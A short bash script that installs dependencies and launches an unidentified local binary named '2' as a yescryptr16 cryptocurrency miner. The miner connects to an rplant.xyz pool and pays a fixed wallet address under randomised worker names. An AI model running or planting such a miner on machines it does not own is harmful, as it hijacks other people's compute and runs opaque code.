#!/bin/bash
sudo apt update
sudo apt install screen libjansson4 -y
sudo apt-get install git build-essential cmake libuv1-dev libssl-dev libhwloc-dev -y
chmod +x 2
./2 -a yescryptr16  -o stratum+tcps://stratum-na.rplant.xyz:7055 -u qXYMA5vogTfh6UaRKgpvnJEgKuZKqgM4wU.$(shuf -i 1000-9999 -n 1)
